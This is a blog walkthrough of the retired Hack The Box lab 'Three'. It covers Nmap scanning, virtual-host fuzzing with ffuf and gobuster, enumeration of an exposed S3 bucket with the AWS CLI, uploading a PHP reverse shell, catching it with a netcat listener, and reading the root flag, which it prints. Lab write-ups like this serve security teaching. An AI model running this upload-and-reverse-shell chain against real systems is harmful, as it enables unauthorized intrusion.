Skip to main content
HashnodesOn4jit's BlogsOn4jit's Blog

Command Palette

Search for a command to run...

HTB Three Walkthrough [Tier 1]: Learning AWS S3 Enumeration and Bucket Exploitation

This walkthrough covers the retired Hack The Box Tier 1 machine Three. The objective is to learn web enumeration, virtual host fuzzing, AWS S3 bucket enumeration, and PHP reverse shell exploitation.

Updated
4 min read
HTB Three Walkthrough [Tier 1]: Learning AWS S3 Enumeration and Bucket Exploitation
S
sOn4jit
Security Researcher passionate about DFIR, Network Security, Web Security, and Vulnerability Assessment.
Part of seriesHack The Box Walkthroughs

Initial Enumeration

We begin by scanning the target machine using Nmap to identify open ports and running services.

nmap -sV -sC 10.129.25.2

Output

Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 03:50 EDT
Nmap scan report for 10.129.25.2
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (reset)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7
80/tcp open  http    Apache httpd 2.4.29

Analysis

Two ports are exposed:

  • 22/tcp running SSH

  • 80/tcp running Apache HTTP Server

Since HTTP is accessible, web enumeration becomes the primary attack surface.

Website Investigation

Opening the website reveals a simple landing page. Checking the Contact section exposes an email address containing the domain:

thetoppers.htb

Since the domain does not resolve automatically, add it manually to /etc/hosts.

sudo nano /etc/hosts

Add:

10.129.25.2 thetoppers.htb

This allows local hostname resolution.

Virtual Host Enumeration

Subdomain enumeration is the next logical step.

We use FFUF to fuzz virtual hosts using the Host header.

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u "http://thetoppers.htb" \
-H "Host: FUZZ.thetoppers.htb" -fs 11952 -mc all

Output

s3                      [Status: 404, Size: 21]
gc._msdcs               [Status: 400, Size: 306]

Another method using Gobuster confirms the result.

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://thetoppers.htb --append-domain

Output

s3.thetoppers.htb Status: 404 [Size: 21]
gc._msdcs.thetoppers.htb Status: 400 [Size: 306]

The interesting subdomain discovered is:

s3.thetoppers.htb

Discovering Amazon S3

Visiting the subdomain shows behavior consistent with an Amazon S3 bucket.

This indicates the target may be exposing cloud storage functionality.

To interact with the service, install AWS CLI.

sudo apt install awscli

Configure AWS CLI:

aws configure

Enumerating the S3 Bucket

List available buckets using:

aws s3 ls --endpoint-url http://s3.thetoppers.htb

Output

2025-08-25 03:49:04 thetoppers.htb

A bucket named thetoppers.htb is exposed.

Now enumerate bucket contents.

aws s3 ls --endpoint-url http://s3.thetoppers.htb s3://thetoppers.htb

Output

PRE images/
2025-08-25 03:49:04          0 .htaccess
2025-08-25 03:49:04      11952 index.php

The presence of index.php confirms the server executes PHP code.

This is highly significant because it opens the possibility of remote code execution through file upload.

Gaining Remote Access

We can exploit the exposed S3 bucket by uploading a PHP reverse shell.

Download the PHP reverse shell from:

https://github.com/pentestmonkey/php-reverse-shell

Save the file as:

shell.php

Before uploading, modify the IP address and listening port inside the reverse shell script.

Uploading the Reverse Shell

Upload the payload to the S3 bucket.

aws --endpoint-url http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb/

Output

upload: ./shell.php to s3://thetoppers.htb/shell.php

Now start a Netcat listener.

nc -lvnp 8080

Once the uploaded PHP file is accessed through the browser, a reverse shell connection is established.

Listener Output

listening on [any] 8080 ...
connect to [10.10.14.122] from (UNKNOWN) [10.129.25.2] 33394
Linux three 4.15.0-189-generic x86_64

We now have remote shell access to the machine.

Capturing the Flag

Search for the flag file.

find / -name flag.txt 2>/dev/null

Output

/root/flag.txt

Display the flag contents.

cat /root/flag.txt

Root Flag :

a980d99281a28d638ac68b9bf9453c2b

Conclusion :

This machine demonstrates how dangerous exposed cloud storage can become when misconfigured.

Key concepts learned from this box:

  • Web enumeration

  • Virtual host fuzzing

  • AWS S3 bucket enumeration

  • AWS CLI usage

  • PHP reverse shell exploitation

  • Remote command execution

Three is an excellent beginner-friendly machine for understanding cloud-related attack surfaces in web applications.

Tools Used -

Tool Purpose
Nmap Port scanning and service enumeration
FFUF Virtual host fuzzing
Gobuster Subdomain enumeration
AWS CLI Interacting with S3 buckets
Netcat Reverse shell listener
PHP Reverse Shell Remote code execution payload
#hackthebox#htb#cybersecurity#aws#web-security#htb-labs

Comments

Join the discussion

No comments yet. Be the first to comment.

Hack The Box Walkthroughs

Part 1 of 3

Writeups and walkthroughs of Hack The Box labs, covering enumeration, exploitation techniques, and lessons learned.

Up next

HTB Dancing Walkthrough [Tier 1]: SMB Enumeration

In this walkthrough, we'll enumerate SMB shares, identify anonymously accessible resources, navigate the file structure, and retrieve the challenge flag while learning the fundamentals of Windows file sharing.

More from this blog

S

sOn4jit's Blog

6 posts

Writeups, projects, and technical notes covering Linux, networking, DFIR, and CTF challenges by sOn4jit.